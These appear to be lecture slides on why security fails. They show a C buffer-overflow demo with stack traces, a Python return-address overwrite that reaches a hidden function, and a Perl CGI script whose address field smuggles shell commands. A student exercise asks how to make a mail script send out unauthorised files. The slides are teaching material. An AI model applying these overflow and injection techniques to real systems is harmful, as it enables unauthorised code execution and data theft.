Busted !

Why Security Systems Fail

Capability List

Access Control List

name[9] 0 0 … degree[4] ‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘s’‘s’ ‘s’‘s’ 0 0 ‘P’‘P’ ‘P’‘P’ ‘h’‘h’ ‘h’‘h’ ‘D’‘D’ ‘D’‘D’ 0 0 strcpy(name,”charles”); 0 0 strcpy(degree,”PhD”); 0 0 … 0 0 printf(name); printf(degree); charles PhD

‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘t’‘t’ ‘t’‘t’ ‘o’‘o’ ‘o’‘o’ 0 0 strcpy(name,”charleton”); ‘n’‘n’ ‘n’‘n’ … name[9] 0 0 … degree[4] 0 0 ‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘t’‘t’ ‘t’‘t’ ‘o’‘o’ ‘o’‘o’ ‘P’‘P’ ‘P’‘P’ ‘h’‘h’ ‘h’‘h’ ‘D’‘D’ ‘D’‘D’ 0 0 ‘n’‘n’ ‘n’‘n’ strcpy(degree,”PhD”); … printf(name); printf(degree); charletonPhD PhD

#include void secret1(void) { puts("You found the secret function No. 1!\n"); } int main () { char string[2]; puts("Input: "); scanf("%s", string); printf("You entered %s.\n", string); return 0; }

At startup of poof 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e52 rbp 0x7fff5fbff828 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

At startup of poof 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e53 rbp 0x7fff5fbff828 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

At startup of poof 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e53 rbp 0x7fff5fbff828 rsp 0x7fff5fbff828 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

At startup of poof 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e53 rbp 0x7fff5fbff828 rsp 0x7fff5fbff828 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

At startup of poof 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e53 rbp 0x7fff5fbff828 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Before call to puts() 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e61 rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Just inside of puts() 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 (ONE INSTRUCTION IN/* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x ea4 rbp 0x7fff5fbff810 rsp 0x7fff5fbff7f8 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Just after return from puts() 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e66 rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Just inside scanf( ) 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa (ONE INSTRUCTION IN) /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e66rsi 0x7fff5fbff800 rbp 0x7fff5fbff810 rsp 0x7fff5fbff7f8 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

After return from scanf ( ) 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e7b rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Just before stack cleanup 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e95 rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

And ready to return to the operating system? 0x e52 : push %rbp/* entry to main() */ 0x e53 : mov %rsp,%rbp 0x e56 : sub $0x10,%rsp 0x e5a : lea 0x75(%rip),%rdi 0x e61 : callq 0x100000ea4 /* puts () */ 0x e66 : lea -0x10(%rbp),%rsi 0x e6a : lea 0x6d(%rip),%rdi 0x e71 : mov $0x0,%eax 0x e76 : callq 0x100000eaa /* scanf () */ 0x e7b : lea -0x10(%rbp),%rsi 0x e7f : lea 0x5b(%rip),%rdi 0x e86 : mov $0x0,%eax 0x e8b : callq 0x100000e9e /* printf () */ 0x e90 : mov $0x0,%eax 0x e95 : leaveq 0x e96 : retq rip 0x e96 rbp 0x rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 ?

0x e40 : push %rbp 0x e41 : mov %rsp,%rbp 0x e44 : lea 0x65(%rip),%rdi # 0x100000eb0 0x e4b : callq 0x100000ea4 0x e50 : leaveq 0x e51 : retq rip 0x e40 rbp 0x rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 ? Hello secret1( ) !!!

$ poof Input: A You entered A. $ cat poop import struct rip = 0x e40 print("A"*24 + struct.pack("<q", rip)) $ python poop | poof Input: You entered You found the secret function No. 1! Segmentation fault $

#!/usr/bin/perl # funky CGI script example $dest = "foo1"; # pretend this is the destination address from the user open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail print MAIL "To: $dest\nFrom: me\n\nHi there!\n"; close MAIL; !/usr/bin/perl # funky CGI script example $dest = "foo1; echo 'this could be bad!';find. -name '*.c' -print;"; open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail print MAIL "To: $dest\nFrom: me\n\nHi there!\n"; close MAIL;

/usr/bin/perl –w # (1) quit unless we have the correct number of command-line args $num_args = $#ARGV + 1; if ($num_args != 2) { print "\nUsage: name.pl -address brief-message\n"; exit; } # (2) we got two command line args, so assume it’s address $dest=$ARGV[0]; $content=$ARGV[1]; my $sendmail = "/usr/sbin/sendmail -t"; #open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail open (MAIL,"|$sendmail") or die "Cannot open sendmail: $!"; print MAIL "To: $dest\n"; print MAIL "From: me\n"; print MAIL "Subject: test\n"; print MAIL "Content-type: text/plain\n\n"; print MAIL $content; close MAIL; Run it with./tryit.pl ccpalmer “Some long message here inside quotes” Could you find a way to trick the perl script into mailing you some file that it shouldn’t???